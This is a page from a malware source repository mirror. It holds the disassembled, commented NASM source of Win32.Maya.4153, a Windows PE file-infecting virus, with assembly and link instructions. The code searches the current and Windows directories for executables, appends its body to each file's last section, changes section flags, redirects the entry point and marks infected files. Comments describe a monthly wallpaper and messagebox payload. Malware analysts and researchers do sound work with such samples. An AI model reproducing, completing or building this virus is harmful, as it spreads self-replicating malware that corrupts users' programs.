mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 01:15:27 +00:00
1122 lines
35 KiB
NASM
1122 lines
35 KiB
NASM
|
;
|
||
|
; Win32.Maya.4153 virus
|
||
|
; disassembly done by peon
|
||
|
;
|
||
|
; Maya is a nonresident PE infector,which searches for victims in the current,
|
||
|
; and the windows directories.It may infect up to 10 files per round(or so).
|
||
|
; On the 1st of any month,infected files display a messagebox and
|
||
|
; set the wallpaper to 'SLAM'.Uses memory mapped files.
|
||
|
; On start,Maya scans the host's imports for GetModuleHandleA for its purposes,
|
||
|
; then looks up apis and searches for exe's in the current and windows
|
||
|
; dirs.Appends itself to the end of the exe's by enlarging the last section
|
||
|
; of the file.Size growth is 4153 bytes (filesize rounded up to file alignment).
|
||
|
; Infection mark is 'WM' in the checksum field of the dos exe header.
|
||
|
; (Files that cant be infected will carry this however)
|
||
|
; Has minor bugs (treats exe header field 3Ch as a word (16bit) etc etc).
|
||
|
; Seems to contain code that is never executed(possibly inclomplete)
|
||
|
;
|
||
|
;
|
||
|
; note:ignore the @xxxx stuff.They were important only while disassembling
|
||
|
; note2:you will notice that the host's entry point is hardcoded to 3000h
|
||
|
; if you compile with Borland stuff,that doesnt make a difference but
|
||
|
; otherwise you might face problems running the first generation.
|
||
|
;
|
||
|
;compilation:
|
||
|
;tasm32 /m /ml wm.asm
|
||
|
;tlink32 wm,,,import32.lib /Tpe
|
||
|
; ..and
|
||
|
;pewrsec wm.exe
|
||
|
; ...to avoid page faults of 1st generation
|
||
|
;
|
||
|
|
||
|
.386 ;i do not comment these
|
||
|
.model flat ;because i guess these are well-known
|
||
|
;and boring
|
||
|
|
||
|
|
||
|
extrn ExitProcess:proc ;1st generation needs this
|
||
|
|
||
|
extrn GetModuleHandleA:proc ;maya needs that the host imports
|
||
|
;this function
|
||
|
|
||
|
;
|
||
|
;define two structures so need no includes
|
||
|
;
|
||
|
_find_data struc ;finddata structure for file searches
|
||
|
_attr dd ?
|
||
|
_creatlo dd ?
|
||
|
_creathi dd ?
|
||
|
_lastalo dd ?
|
||
|
_lastahi dd ?
|
||
|
_lastwlo dd ?
|
||
|
_lastwhi dd ?
|
||
|
_sizehi dd ?
|
||
|
_sizelo dd ?
|
||
|
_res0 dd ?
|
||
|
_res1 dd ?
|
||
|
_fname db 260 dup(?) ;the only important field for us
|
||
|
_altname db 14 dup (?)
|
||
|
_find_data ends
|
||
|
|
||
|
win32systime struc ;system time structure for payload checking
|
||
|
wyear dw ?
|
||
|
wmonth dw ?
|
||
|
wdow dw ?
|
||
|
wday dw ? ;we are interested in checking the day
|
||
|
whour dw ?
|
||
|
wmin dw ?
|
||
|
wsec dw ?
|
||
|
wmillisec dw ?
|
||
|
win32systime ends
|
||
|
|
||
|
|
||
|
.code
|
||
|
;------------------- viral code begins here -----------------------
|
||
|
|
||
|
maya_length equ maya_end-maya_start ;size of viral code
|
||
|
maya_start equ $
|
||
|
|
||
|
;
|
||
|
;calculate delta offset and get a handle to KERNEL32.dll
|
||
|
;
|
||
|
maya:
|
||
|
push ebp ;store ebp on stack
|
||
|
call maya_flexible_entry;flexible entry point
|
||
|
maya_flexible_entry:
|
||
|
pop ebp ;will calculate delta offset
|
||
|
mov ebx,ebp
|
||
|
sub ebp,offset maya_flexible_entry
|
||
|
mov eax,1000h ;RVA of viral section,hardcoded
|
||
|
maya_rva_of_viral_section equ $-4
|
||
|
add eax,6 ;
|
||
|
sub ebx,eax ;got imagebase
|
||
|
mov [ebp+offset maya_imagebase],ebx ;store imagebase
|
||
|
mov edx,offset maya_getmodulehandlea
|
||
|
add edx,ebp ;fetch ptr to 'GetModulaHandleA' string
|
||
|
mov ecx,[ebp+offset maya_getmodulehandlea_len] ;fetch string length
|
||
|
push ebp ;save delta
|
||
|
call maya_lookup_getmodulehandle ;search for import in host
|
||
|
pop ebp ;get delta bk
|
||
|
cmp eax,-1 ;failed?
|
||
|
jz maya_restart_host ;yes,abort
|
||
|
mov [ebp+offset maya_getmodulehandlea_add],eax ;store address
|
||
|
push ebp ;push delta
|
||
|
mov ebx,offset maya_k32 ;fetch ptr to 'KERNEL32.dll' string
|
||
|
add ebx,ebp ;add delta
|
||
|
push ebx ;store parameter
|
||
|
call eax ;call GetModuleHandleA('KERNEL32.dll')
|
||
|
pop ebp ;get delta bk
|
||
|
mov [ebp+offset maya_addof_k32],eax ;store add off K32
|
||
|
;
|
||
|
;look up api's
|
||
|
;
|
||
|
mov edi,offset maya_getmodulehandlea_len ;add of length of 1st string
|
||
|
add edi,ebp ;plus delta offset
|
||
|
maya_lookup_loop:
|
||
|
mov ecx,[edi] ;get string length
|
||
|
cmp ecx,'MAYA' ;end of api names?
|
||
|
jz maya_lookup_done ;yes
|
||
|
add edi,4 ;skip length of string
|
||
|
mov edx,edi ;store ptr
|
||
|
add edi,ecx ;edi points to where we want result
|
||
|
push edi
|
||
|
call maya_get_apis ;look up api
|
||
|
pop edi
|
||
|
mov [edi],eax ;store add
|
||
|
add edi,4 ;go to add of next
|
||
|
jmp maya_lookup_loop ;and branch
|
||
|
maya_lookup_done:
|
||
|
mov dword ptr [ebp+offset maya_infection_counter],0 ;kill counter
|
||
|
;
|
||
|
;search for executables and infect them
|
||
|
;
|
||
|
call maya_process_current_directory
|
||
|
call maya_process_windows_directory
|
||
|
;
|
||
|
;lookup a few more apis--possibly incomplete
|
||
|
;
|
||
|
call maya_lookup_more
|
||
|
;
|
||
|
;payload check
|
||
|
;
|
||
|
call maya_payload
|
||
|
;
|
||
|
;jump to host
|
||
|
;
|
||
|
maya_restart_host:
|
||
|
mov eax,[ebp+offset maya_entry_of_host] ;get host entry rva
|
||
|
add eax,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
pop ebp ;restore ebp
|
||
|
push eax ;save return address
|
||
|
ret ;and jump to host
|
||
|
;
|
||
|
;get api addresses needed for infection
|
||
|
;
|
||
|
maya_get_apis:
|
||
|
mov esi,[ebp+offset maya_addof_k32] ;get add of K32
|
||
|
cmp word ptr [esi],'ZM' ;is it an exe?
|
||
|
jne maya_get_apis_return_failure;nope,abort
|
||
|
xor eax,eax ;zero register
|
||
|
mov ax,[esi+3ch] ;ptr to PE header
|
||
|
add eax,[ebp+offset maya_addof_k32];plus K32 base
|
||
|
xchg esi,eax ;into esi
|
||
|
cmp word ptr [esi],'EP' ;is it a PE?
|
||
|
jne maya_get_apis_return_failure;nope,abort
|
||
|
mov esi,[esi+78h] ;get exports rva in K32
|
||
|
add esi,[ebp+offset maya_addof_k32];plus K32 base
|
||
|
mov eax,[esi+1ch]
|
||
|
add eax,[ebp+offset maya_addof_k32]
|
||
|
mov [ebp+offset maya_eat],eax ;store it
|
||
|
mov eax,[esi+20h] ;ptrs to exported names
|
||
|
add eax,[ebp+offset maya_addof_k32]
|
||
|
mov [ebp+offset maya_expnames],eax ;store it
|
||
|
mov eax,[esi+24h] ;ptrs to export ordinals
|
||
|
add eax,[ebp+offset maya_addof_k32]
|
||
|
mov [ebp+offset maya_eord],eax ;store it
|
||
|
xor eax,eax ;zero register
|
||
|
maya_get_apis_loop:
|
||
|
push ecx ;save string length
|
||
|
mov esi,edx ;esi=ptr to name that is searched for
|
||
|
mov edi,[ebp+offset maya_expnames];ptr to exported names
|
||
|
add edi,eax
|
||
|
mov edi,[edi] ;fetch ptr to exported fuction name
|
||
|
add edi,[ebp+offset maya_addof_k32] ;add K32 base
|
||
|
repe ;compare names
|
||
|
cmpsb
|
||
|
cmp ecx,0 ;perfect match?
|
||
|
je maya_get_apis_found ;yes
|
||
|
add eax,4 ;nope,proceed with next
|
||
|
pop ecx ;get string length back
|
||
|
jmp maya_get_apis_loop ;and compare with next name in K32
|
||
|
maya_get_apis_found:
|
||
|
pop ecx ;remove ecx from stack
|
||
|
shr eax,1 ;halve eax
|
||
|
add eax,[ebp+offset maya_eord] ;fix ptr to eord's
|
||
|
xor ebx,ebx ;zero ebx
|
||
|
mov bx,[eax] ;fetch eord
|
||
|
shl ebx,2 ;*4
|
||
|
add ebx,[ebp+offset maya_eat] ;add exports add table offset
|
||
|
mov eax,[ebx] ;get rva of function
|
||
|
add eax,[ebp+offset maya_addof_k32];add base of K32
|
||
|
ret ;and return to caller
|
||
|
maya_get_apis_return_failure:
|
||
|
mov eax,-1 ;return failure to caller
|
||
|
ret
|
||
|
;
|
||
|
;searches the host's imports for GetModuleHanldeA
|
||
|
;
|
||
|
maya_lookup_getmodulehandle:
|
||
|
mov esi,[ebp+offset maya_imagebase] ;get imagebase
|
||
|
cmp word ptr [esi],'ZM' ;host file must be exe
|
||
|
jne maya_lookup_getmodulehandle_return_failure ;but it isnt so abort
|
||
|
xor eax,eax ;zero reg
|
||
|
mov ax,[esi+3ch] ;ptr to PE head
|
||
|
mov esi,eax ;into esi
|
||
|
add esi,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
cmp word ptr [esi],'EP' ;is it a PE?
|
||
|
jne maya_lookup_getmodulehandle_return_failure ;nope,abort
|
||
|
mov esi,[esi+80h] ;get imports rva
|
||
|
add esi,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
mov eax,esi
|
||
|
maya_lookup_getmodulehandle_dll_loop:
|
||
|
mov esi,eax
|
||
|
mov esi,[esi+0ch] ;name rva of dll module
|
||
|
add esi,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
cmp [esi],'NREK' ;is module name 'KERN...'?
|
||
|
je maya_lookup_getmodulehandle_dll_ok ;yes
|
||
|
add eax,14h ;next entry
|
||
|
jmp maya_lookup_getmodulehandle_dll_loop;check next
|
||
|
maya_lookup_getmodulehandle_dll_ok:
|
||
|
mov esi,eax
|
||
|
mov eax,[esi+10h] ;import lookup table rva
|
||
|
add eax,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
mov [ebp+offset maya_ilt],eax ;store ilt rva
|
||
|
cmp dword ptr [esi],0 ;
|
||
|
je maya_lookup_getmodulehandle_return_failure
|
||
|
mov esi,[esi] ;
|
||
|
add esi,[ebp+offset maya_imagebase] ;add imagebase
|
||
|
mov ebx,esi ;store ptr
|
||
|
xor eax,eax ;zero reg
|
||
|
maya_lookup_getmodulehandle_function_loop:
|
||
|
cmp dword ptr [ebx],0
|
||
|
je maya_lookup_getmodulehandle_return_failure
|
||
|
cmp byte ptr [ebx+3],80h
|
||
|
je maya_lookup_getmodulehandle_nextfunction
|
||
|
mov esi,[ebx]
|
||
|
add esi,[ebp+offset maya_imagebase]
|
||
|
add esi,2
|
||
|
mov edi,edx
|
||
|
push ecx
|
||
|
repe
|
||
|
cmpsb ;compare function names
|
||
|
cmp ecx,0 ;match?
|
||
|
pop ecx
|
||
|
je maya_lookup_getmodulehandle_done ;yes
|
||
|
maya_lookup_getmodulehandle_nextfunction:
|
||
|
inc eax
|
||
|
add ebx,4
|
||
|
jmp maya_lookup_getmodulehandle_function_loop
|
||
|
maya_lookup_getmodulehandle_done:
|
||
|
shl eax,2 ;*4
|
||
|
add eax,[ebp+offset maya_ilt]
|
||
|
mov ebx,eax
|
||
|
mov eax,[eax] ;got the add
|
||
|
ret ;so return to the caller
|
||
|
maya_lookup_getmodulehandle_return_failure:
|
||
|
mov eax,-1 ;show that we failed
|
||
|
ret ;and return to the caller
|
||
|
;
|
||
|
;file infection subroutine
|
||
|
;
|
||
|
maya_infect: ;@11F3
|
||
|
mov dword ptr[ebp+offset maya_successfull_infection],0 ;kill flag
|
||
|
call maya_getfileattrs ;get file attr
|
||
|
mov [ebp+offset maya_fileattrib],eax ;store it
|
||
|
push edx ;ptr to filename
|
||
|
mov eax,80h ;normal attr
|
||
|
call maya_setfileattrs
|
||
|
pop edx
|
||
|
push edx
|
||
|
call maya_openfile ;open file
|
||
|
cmp eax,-1 ;failed?
|
||
|
je maya_infect_restore_attr ;yes,abort
|
||
|
mov [ebp+offset maya_handle],eax ;store handle
|
||
|
call maya_getfsize
|
||
|
cmp eax,-1 ;failed?
|
||
|
je maya_infect_closefile ;yes,abort
|
||
|
cmp dword ptr [ebp+offset maya_filesize_high_dword],0 ;file smaller
|
||
|
; than 4 GB?
|
||
|
jne maya_infect_closefile ;nope abort
|
||
|
xchg ecx,eax
|
||
|
mov [ebp+offset maya_filesize],ecx ;store filesize
|
||
|
mov eax,[ebp+offset maya_handle] ;get handle
|
||
|
mov ecx,[ebp+offset maya_filesize] ;get filesize
|
||
|
add ecx,maya_length+1000h ;add virus size+1000h
|
||
|
call maya_createfmap ;create file mapping
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_infect_closemap ;yes,abort
|
||
|
mov [ebp+offset maya_maphandle],eax ;store handle
|
||
|
mov ecx,[ebp+offset maya_filesize] ;get size of victim
|
||
|
add ecx,maya_length+1000h
|
||
|
call maya_mapview ;MapViewOfFile()
|
||
|
cmp eax,0 ;failed?
|
||
|
je maya_infect_closemap ;yes,abort
|
||
|
mov [ebp+offset maya_mappedadd],eax ;store ptr
|
||
|
mov esi,eax ;and load into esi
|
||
|
cmp word ptr [esi],'ZM' ;EXE?
|
||
|
jne maya_infect_unmap
|
||
|
cmp word ptr [esi+12h],'MW' ;WM in the checksum
|
||
|
je maya_infect_unmap ;field?(already inf'd)
|
||
|
mov word ptr [esi+12h],'MW' ;mark infected
|
||
|
xor eax,eax
|
||
|
mov ax,[esi+3ch] ;ptr to PE header
|
||
|
cmp ax,0 ;no PE header?
|
||
|
je maya_infect_unmap
|
||
|
cmp eax,maya_filesize ;header located
|
||
|
;*** ;beyond eof?
|
||
|
;bug:should be cmp eax,[ebp+maya_filesize] for proper operation
|
||
|
;***
|
||
|
jnc maya_infect_unmap ;yes abort
|
||
|
add eax,[ebp+offset maya_mappedadd] ;get add of mapped
|
||
|
mov esi,eax ;PE header
|
||
|
cmp word ptr [esi],'EP' ;PE?
|
||
|
jne maya_infect_unmap ;nope abort
|
||
|
mov [ebp+offset maya_peptr],eax ;store ptr to PE head
|
||
|
mov eax,[esi+3ch] ;get filealign
|
||
|
mov [ebp+offset maya_filealign],eax ;store it
|
||
|
mov eax,[ebp+offset maya_entry_of_host] ;get current host entry
|
||
|
mov [ebp+offset maya_olderva],eax ;store it
|
||
|
mov eax,[esi+28h] ;get victim entry rva
|
||
|
mov [ebp+offset maya_entry_of_host],eax ;store it
|
||
|
mov eax,[esi+74h]
|
||
|
shl eax,3 ;*8
|
||
|
add eax,[ebp+offset maya_peptr]
|
||
|
add eax,78h
|
||
|
xor ecx,ecx ;zero register
|
||
|
mov cx,[esi+6] ;get object count
|
||
|
maya_infect_setwbit: ;@1318
|
||
|
or dword ptr [eax+24h],80000000h ;set W bit of sections
|
||
|
add eax,28h ;next section...
|
||
|
loop maya_infect_setwbit
|
||
|
sub eax,28h ;ptr to last entry
|
||
|
mov [ebp+offset maya_ptrtolastsection],eax ;store it
|
||
|
mov edi,eax ;ptr into edi
|
||
|
mov eax,[edi+10h] ;get section PhysSize
|
||
|
mov [ebp+offset maya_sectps],eax ;store it
|
||
|
add eax,[edi+0ch] ;plus section rva
|
||
|
mov [ebp+offset maya_rva_of_viral_section],eax ;patch code
|
||
|
mov [ebp+offset maya_sectrva],eax ;store it
|
||
|
push edi
|
||
|
mov eax,[edi+14h] ;get section PhysOffs
|
||
|
add eax,[ebp+offset maya_mappedadd] ;get ptr to raw
|
||
|
;data of last section
|
||
|
add eax,[edi+10h] ;add PhysSize
|
||
|
mov edi,eax ;load ptr into edi
|
||
|
mov esi,offset maya_start ;get virus start add
|
||
|
add esi,ebp ;add delta offset
|
||
|
mov ecx,maya_length ;length of code
|
||
|
cld ;increase pointers
|
||
|
rep ;move viral code..
|
||
|
movsb ;..into the mapped..
|
||
|
pop edi ;..executable
|
||
|
add dword ptr [edi+10h],maya_length ;update..
|
||
|
;..sectionPhysSize
|
||
|
add dword ptr [ebp+offset maya_filesize],maya_length ;and filesize
|
||
|
xor edx,edx ;zero edx
|
||
|
mov eax,[edi+10h] ;get section PhysSize
|
||
|
mov ecx,[ebp+offset maya_filealign]
|
||
|
push ecx ;calculates section..
|
||
|
div ecx ;..PhysSize with respect
|
||
|
pop ecx ;to file alignment unit
|
||
|
sub ecx,edx ;calculate padding
|
||
|
add [edi+10h],ecx ;and add to PhysSize
|
||
|
add [ebp+offset maya_filesize],ecx
|
||
|
mov eax,[edi+10h] ;get updated PhysSize
|
||
|
mov [edi+8],eax ;set virtual size
|
||
|
or dword ptr [edi+24h],20h ;set Code flag
|
||
|
or dword ptr [edi+24h],20000000h ;set Executable flag
|
||
|
mov esi,[ebp+offset maya_peptr] ;get ptr to PE head
|
||
|
mov eax,[ebp+offset maya_sectrva] ;get rva of last section
|
||
|
mov [esi+28h],eax ;set new entry point
|
||
|
mov eax,[edi+0ch] ;get section rva
|
||
|
add eax,[edi+10h] ;add section PhysSize
|
||
|
mov [esi+50h],eax ;set imagesize
|
||
|
mov eax,[ebp+offset maya_olderva] ;get current host entry
|
||
|
mov [ebp+offset maya_entry_of_host],eax ;restore it
|
||
|
mov dword ptr[ebp+offset maya_successfull_infection],1
|
||
|
;set flag
|
||
|
maya_infect_unmap: ;@13D0
|
||
|
mov eax,[ebp+offset maya_mappedadd]
|
||
|
call maya_unmapview ;call UnmapViewOfFile
|
||
|
maya_infect_closemap: ;@13DB
|
||
|
mov eax,[ebp+offset maya_maphandle] ;call CloseHandle
|
||
|
call maya_closefile
|
||
|
mov eax,[ebp+offset maya_handle]
|
||
|
mov ecx,[ebp+offset maya_filesize]
|
||
|
call maya_setfilepo ;set file pointer to end
|
||
|
cmp eax,-1
|
||
|
je maya_infect_closefile
|
||
|
mov eax,[ebp+offset maya_handle]
|
||
|
call maya_seteof ;and set end of file
|
||
|
maya_infect_closefile:
|
||
|
mov eax,[ebp+offset maya_handle]
|
||
|
call maya_closefile ;finally close file
|
||
|
maya_infect_restore_attr:
|
||
|
pop edx ;ptr to filename
|
||
|
mov eax,[ebp+offset maya_fileattrib]
|
||
|
call maya_setfileattrs ;restore attributes
|
||
|
ret ;and return to caller
|
||
|
;
|
||
|
;subroutines used during infection
|
||
|
;
|
||
|
maya_openfile: ;@141F
|
||
|
push ebp
|
||
|
push 0
|
||
|
push 80h
|
||
|
push 3
|
||
|
push 0
|
||
|
push 1
|
||
|
push 0C0000000h
|
||
|
push edx
|
||
|
mov eax,[ebp+offset maya_createfilea_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_closefile: ;@143D
|
||
|
push ebp
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_closehandle_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_createfmap: ;@1449
|
||
|
push ebp
|
||
|
push 0
|
||
|
push ecx
|
||
|
push 0
|
||
|
push 4
|
||
|
push 0
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_createfilemappinga_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_mapview: ;@145E
|
||
|
push ebp
|
||
|
push ecx
|
||
|
push 0
|
||
|
push 0
|
||
|
push 2
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_mapviewoffile_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_unmapview: ;@1471
|
||
|
push ebp
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_unmapviewoffile_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_setfilepo: ;@147D
|
||
|
push ebp
|
||
|
push 0
|
||
|
push 0
|
||
|
push ecx
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_setfilepointer_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_seteof: ;@148E
|
||
|
push ebp
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_setendoffile_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getfsize: ;@149A
|
||
|
push ebp
|
||
|
mov ebx,offset maya_filesize_high_dword ;get add of room for
|
||
|
add ebx,ebp ;hi dword of filesize
|
||
|
push ebx ;store ptr
|
||
|
push eax ;store handle
|
||
|
mov eax,[ebp+offset maya_getfilesize_add];get fn add
|
||
|
call eax ;call fn
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getfileattrs: ;@14AE
|
||
|
push ebp
|
||
|
push edx
|
||
|
push edx ;store filename as param
|
||
|
mov eax,[ebp+offset maya_getfileattributesa_add]
|
||
|
call eax ;call function
|
||
|
pop edx
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_setfileattrs: ;@14BC
|
||
|
push ebp
|
||
|
push eax ;store params
|
||
|
push edx
|
||
|
mov eax,[ebp+offset maya_setfileattributesa_add]
|
||
|
call eax ;call fn
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getcurrdir: ;@14C9
|
||
|
push ebp
|
||
|
push eax ;ptr to buffer
|
||
|
push 80h ;buffer size
|
||
|
mov eax,[ebp+offset maya_getcurrentdirectorya_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_setcurrdir: ;@14DA
|
||
|
push ebp
|
||
|
push eax ;ptr to path
|
||
|
mov eax,[ebp+offset maya_setcurrentdirectorya_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getwindir: ;@14E6
|
||
|
push ebp
|
||
|
push 80h ;buffer size
|
||
|
push eax ;ptr to buffer
|
||
|
mov eax,[ebp+offset maya_getwindowsdirectorya_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getsystime: ;@14F7
|
||
|
push ebp
|
||
|
mov eax,offset maya_systime
|
||
|
add eax,ebp
|
||
|
push eax ;store ptr to structure to be filled
|
||
|
mov eax,[ebp+offset maya_getsystemtime_add]
|
||
|
call eax ;call fn
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getmodhand: ;@150A
|
||
|
push ebp
|
||
|
push eax
|
||
|
mov eax,[ebp+offset maya_getmodulehandlea_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
maya_getprocadd: ;@1516
|
||
|
push ebp
|
||
|
push edx ;ptr to fn name
|
||
|
push eax ;hModule
|
||
|
mov eax,[ebp+offset maya_getprocaddress_add]
|
||
|
call eax
|
||
|
pop ebp
|
||
|
ret
|
||
|
;
|
||
|
;
|
||
|
;
|
||
|
maya_lookup_more: ;@1523
|
||
|
mov edi,offset maya_movefilea_len ;ptr to more api names
|
||
|
add edi,ebp ;plus delta offset
|
||
|
maya_lookup_more_loop: ;loop begins here
|
||
|
mov ecx,[edi] ;get length of name string
|
||
|
cmp ecx,'SHAI' ;end of api names?
|
||
|
je maya_lookup_more_return ;yes
|
||
|
add edi,4 ;skip length of string
|
||
|
mov edx,edi ;edx points to api name
|
||
|
push edi ;save regs
|
||
|
push ecx
|
||
|
push ebp
|
||
|
call maya_lookup_getmodulehandle ;get fn add
|
||
|
;this call will fail or virus causes a fault at line 579
|
||
|
pop ebp ;get regs back
|
||
|
pop ecx
|
||
|
pop edi
|
||
|
add edi,ecx ;get ptr to room for address,after api name
|
||
|
cmp eax,-1
|
||
|
je maya_lookup_more_nextfn
|
||
|
mov [edi],eax ;store fn add
|
||
|
mov eax,[edi+4]
|
||
|
add eax,ebp
|
||
|
mov [ebx],eax
|
||
|
maya_lookup_more_nextfn:
|
||
|
add edi,8 ;next
|
||
|
jmp maya_lookup_more_loop
|
||
|
maya_lookup_more_return: ;@1559
|
||
|
ret
|
||
|
;
|
||
|
;the following code is probaly dead
|
||
|
;
|
||
|
maya_deadcode:
|
||
|
pushad
|
||
|
call maya_deadcode_calculate_deltaoffset
|
||
|
add ecx,28h
|
||
|
mov edx,[esp+ecx]
|
||
|
call maya_deadcode_extension_check
|
||
|
cmp eax,1
|
||
|
jne maya_deadcode_skip
|
||
|
call maya_infect
|
||
|
maya_deadcode_skip:
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
maya_deadcode_extension_check:
|
||
|
mov esi,edx ;get filename ptr into esi
|
||
|
cld ;increase ptrs
|
||
|
maya_deadcode_extension_check_loop:
|
||
|
lodsb ;fetch character of filename
|
||
|
cmp al,0 ;null?
|
||
|
je maya_deadcode_extension_check_ret0 ;yes abort
|
||
|
cmp al,'.' ;dot?
|
||
|
jne maya_deadcode_extension_check_loop ;nope branch to find dot
|
||
|
cmp dword ptr [esi-1],'EXE.';extension check
|
||
|
je maya_deadcode_extension_check_ret1
|
||
|
cmp dword ptr [esi-1],'exe.';extension check
|
||
|
je maya_deadcode_extension_check_ret1
|
||
|
maya_deadcode_extension_check_ret0:
|
||
|
xor eax,eax ;return failure
|
||
|
ret
|
||
|
maya_deadcode_extension_check_ret1:
|
||
|
mov eax,1 ;return success
|
||
|
ret
|
||
|
;@159x
|
||
|
;
|
||
|
;these calls dont seem to be executed
|
||
|
;
|
||
|
maya_deadcode_call1 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_movefilea_add]
|
||
|
maya_deadcode_call2 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_copyfilea_add]
|
||
|
maya_deadcode_call3 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_createfilea2_add]
|
||
|
maya_deadcode_call4 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_deletefilea_add]
|
||
|
maya_deadcode_call5 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_setfileattributesa2_add]
|
||
|
maya_deadcode_call6 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_getfileattributesa2_add]
|
||
|
maya_deadcode_call7 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_getfullpathnamea_add]
|
||
|
maya_deadcode_call8 equ $
|
||
|
call maya_deadcode_hook
|
||
|
jmp [ecx+offset maya_createprocessa_add]
|
||
|
|
||
|
maya_deadcode_hook:
|
||
|
mov ecx,4
|
||
|
call maya_deadcode
|
||
|
push ebp
|
||
|
call maya_deadcode_calculate_deltaoffset
|
||
|
mov ecx,ebp
|
||
|
pop ebp
|
||
|
ret
|
||
|
|
||
|
maya_deadcode_calculate_deltaoffset:
|
||
|
call $+5
|
||
|
maya_deadcode_calculate_deltaoffset_plus5:
|
||
|
pop ebp
|
||
|
sub ebp,offset maya_deadcode_calculate_deltaoffset_plus5
|
||
|
ret
|
||
|
;
|
||
|
;file searching routines
|
||
|
;
|
||
|
maya_process_windows_directory:
|
||
|
mov dword ptr[ebp+offset maya_infection_counter],0 ;kill counter
|
||
|
call maya_process_current_directory ;attack current dir again
|
||
|
cmp dword ptr[ebp+offset maya_infection_counter],5 ;inf'd 5 files again?
|
||
|
je maya_process_windows_directory_return ;if so return
|
||
|
mov eax,offset maya_currdir
|
||
|
add eax,ebp
|
||
|
call maya_getcurrdir
|
||
|
cmp eax,0
|
||
|
je maya_process_windows_directory_return
|
||
|
mov eax,offset maya_windir
|
||
|
add eax,ebp
|
||
|
call maya_getwindir
|
||
|
cmp eax,0
|
||
|
je maya_process_windows_directory_return
|
||
|
mov eax,offset maya_windir
|
||
|
add eax,ebp
|
||
|
call maya_setcurrdir
|
||
|
cmp eax,0
|
||
|
je maya_process_windows_directory_return
|
||
|
call maya_process_current_directory
|
||
|
mov eax,offset maya_currdir
|
||
|
add eax,ebp
|
||
|
call maya_setcurrdir
|
||
|
maya_process_windows_directory_return:
|
||
|
ret ;return to caller
|
||
|
;
|
||
|
;routine to scan for and infect files in the current directory
|
||
|
;
|
||
|
maya_process_current_directory: ;@1674
|
||
|
push ebp
|
||
|
mov eax,offset maya_finddata ;get add of structure
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;store parameter
|
||
|
mov eax,offset maya_filemask ;get add of filemask
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;store parameter
|
||
|
mov eax,[ebp+offset maya_findfirstfilea_add];get add of FindFirstFileA
|
||
|
call eax ;call function
|
||
|
pop ebp
|
||
|
cmp eax,-1 ;failed?
|
||
|
je maya_process_current_directory_return;yes
|
||
|
mov [ebp+offset maya_findhandle],eax ;store handle
|
||
|
mov edx,offset maya_finddata._fname ;get ptr to filename
|
||
|
add edx,ebp ;add delta offset
|
||
|
call maya_infect ;try to infect file
|
||
|
cmp dword ptr[ebp+offset maya_successfull_infection],1 ;check flag
|
||
|
jne maya_process_current_directory_findnext
|
||
|
inc dword ptr[ebp+offset maya_infection_counter] ;increment counter
|
||
|
cmp dword ptr[ebp+offset maya_infection_counter],5;already infected 5 files?
|
||
|
je maya_process_current_directory_return ;yes so return to caller
|
||
|
maya_process_current_directory_findnext:
|
||
|
push ebp
|
||
|
mov eax,offset maya_finddata ;get add of structure
|
||
|
add eax,ebp ;add delta offset
|
||
|
push eax ;store parameter
|
||
|
push dword ptr[ebp+offset maya_findhandle] ;store parameter
|
||
|
mov eax,[ebp+offset maya_findnextfilea_add] ;get add of FindNextFileA
|
||
|
call eax ;call function
|
||
|
pop ebp
|
||
|
cmp eax,0 ;found more?
|
||
|
je maya_process_current_directory_return;nope
|
||
|
mov edx,offset maya_finddata._fname ;get filename
|
||
|
add edx,ebp ;add delta offset
|
||
|
call maya_infect ;try to infect file
|
||
|
cmp dword ptr[ebp+offset maya_successfull_infection],1 ;inf ok?
|
||
|
jne maya_process_current_directory_findnext ;nope proceed
|
||
|
inc dword ptr[ebp+offset maya_infection_counter] ;inc counter
|
||
|
cmp dword ptr[ebp+offset maya_infection_counter],5 ;already 5?
|
||
|
je maya_process_current_directory_return ;yes return to caller
|
||
|
jmp maya_process_current_directory_findnext ;nope find more files
|
||
|
maya_process_current_directory_return:
|
||
|
ret ;return to caller
|
||
|
|
||
|
